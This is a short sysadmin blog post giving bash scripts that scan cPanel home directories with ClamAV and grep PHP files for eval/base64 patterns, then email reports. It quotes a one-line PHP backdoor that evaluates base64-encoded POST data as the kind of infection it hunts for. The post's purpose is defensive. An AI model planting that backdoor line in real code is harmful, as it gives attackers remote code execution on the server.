clean php files from eval infection
August 26, 2013
In order to keep the Linux server as safe as possible I wrote two quick bash scripts that scan for infected files and then send me an email report so I can take action.
On the server I have CentOS with WHM/cPanel, and as antivirus I use ClamAV. To scan the home directories I use:
#!/bin/bash
# Antivirus scan of every cPanel account's home directory; infected files are mailed as a report.
LOG=/my/log/file
rm -f "$LOG"
# /etc/userdomains lists "domain: user"; take the user column and skip the "nobody" entries.
for i in $(awk '!/nobody/{print $2}' /etc/userdomains | sort | uniq); do
    /usr/bin/clamscan --no-summary -i -r "/home/$i" 2>/dev/null
done >> "$LOG"
# Only send the mail when clamscan listed at least one infected file (the log is non-empty).
if [ -s "$LOG" ]; then
    printf "\n" >> "$LOG"
    sed -i "1i Subject: Virus Report `date +%m-%d-%Y`" "$LOG"
    /usr/sbin/sendmail -v [email protected] < "$LOG"
fi
Now there is another possibility: some PHP scripts will contain something like:
<?php
// a recent attack I've seen: a backdoor that runs whatever base64-encoded PHP is POSTed to it
if ($_POST["php"]) { eval(base64_decode($_POST["php"])); exit; }
In the above case the antivirus won't detect the threat.
To overcome this I created a script that scans the home directories for PHP files containing certain patterns. I then check those files manually to make sure everything is OK.
#!/bin/bash
# List PHP files that eval() a decoded payload and mail the list for manual review.
OUT=/my/log/base64eval_output.txt
rm -f "$OUT"
find /home -type f -name "*.php" -exec grep -l -e "eval(base" -e "eval(gz" {} + >> "$OUT"
printf "\n" >> "$OUT"
sed -i "1i Subject: PHP eval Report `date +%m-%d-%Y`" "$OUT"
/usr/sbin/sendmail -v [email protected] < "$OUT"
You can also download the two scripts directly and then add them to cron as described below:
base64eval_scan
antivirus_scan
And now the cron:
crontab -e
then add the following two lines:
0 2 * * 5 /root/scripts/base64eval_scan > /dev/null 2>&1
0 6 * * * /root/scripts/mails_sent_from_scripts_status > /dev/null 2>&1
Don't hesitate to let me know if this helped you in some way, and of course any improvements or suggestions you may have.
Thank you!